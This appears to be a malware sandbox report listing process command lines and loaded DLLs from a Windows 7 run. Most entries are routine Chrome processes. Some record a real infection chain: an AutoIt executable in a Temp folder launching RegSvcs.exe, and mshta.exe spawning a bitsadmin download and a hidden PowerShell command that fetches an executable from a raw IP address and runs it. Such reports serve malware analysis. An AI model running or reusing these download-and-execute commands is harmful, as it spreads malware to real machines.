c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dxva2.dll
c:\program files\google\chrome\application\68.0.3440.106\d3dcompiler_47.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libglesv2.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libegl.dll

PID
3748
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=976,9579535764433420095,1709175414698601435,131072 --enable-features=PasswordImport --service-pipe-token=261CA67205A0B338F2C18D82FA22F4B0 --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=261CA67205A0B338F2C18D82FA22F4B0 --renderer-client-id=5 --mojo-platform-channel-handle=1876 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2128
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=976,9579535764433420095,1709175414698601435,131072 --enable-features=PasswordImport --service-pipe-token=06A818FDB331834159BC90262BB46137 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=06A818FDB331834159BC90262BB46137 --renderer-client-id=3 --mojo-platform-channel-handle=2076 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3708
CMD
C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe C:\Users\admin\AppData\Local\Temp\88127361\YICNU
Path
C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe
Indicators
Parent process
mdo.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
AutoIt Team
Description
AutoIt v3 Script
Version
3, 3, 14, 5
Modules
Image
c:\users\admin\appdata\local\temp\88127361\mdo.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe

PID
3092
CMD
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Indicators
Parent process
mdo.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft .NET Services Installation Utility
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\225759bb87c854c0fff27b1d84858c21\mscorlib.ni.dll
c:\windows\system32\cryptbase.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\52cca48930e580e3189eac47158c20be\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.drawing\646b4b01cb29986f8e076aa65c9e9753\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.windows.forms\5aac750b35b27770dccb1a43f83cced7\system.windows.forms.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\55560c2014611e9119f99923c9ebdeef\system.core.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.v9921e851#\7ca6a7b9413844e82108a9d62f88a2d9\microsoft.visualbasic.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\uxtheme.dll
c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\46957030830964165644b52b0696c5d9\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\d86b080a37c60a872c82b912a2a63dac\system.xml.ni.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\rpcrtremote.dll

PID
3252
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=976,9579535764433420095,1709175414698601435,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=22DB7F4F539D35BC4E646686817B5CD5 --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=22DB7F4F539D35BC4E646686817B5CD5 --renderer-client-id=6 --mojo-platform-channel-handle=3520 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3644
CMD
"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal Your Binded File Direct URL C:\Users\admin\AppData\Local\Temp\image.png
Path
C:\Windows\System32\bitsadmin.exe
Indicators
No indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147942487
Version:
Company
Microsoft Corporation
Description
BITS administration utility
Version
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qmgrprxy.dll

PID
2920
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://141.136.44.78/jnn/jnn.exe','C:\Users\admin\AppData\Local\Temp\Hmmmm.exe');Start-Process C:\Users\admin\AppData\Local\Temp\Hmmmm.exe;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\netutils.dll

PID
2148
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=976,9579535764433420095,1709175414698601435,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=7E47B4A7358A3B15EFFE617417FC1FC4 --mojo-platform-channel-handle=3800 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3816
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=976,9579535764433420095,1709175414698601435,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=ACB0FCBE7830F199C88BCDBDF42D6BC7 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=ACB0FCBE7830F199C88BCDBDF42D6BC7 --renderer-client-id=8 --mojo-platform-channel-handle=3912 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3464
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=976,9579535764433420095,1709175414698601435,131072 --enable-features=PasswordImport --disable-gpu-sandbox --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=16CD517B57A14EE5B87BC10634A9FAFE --mojo-platform-channel-handle=3268 /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
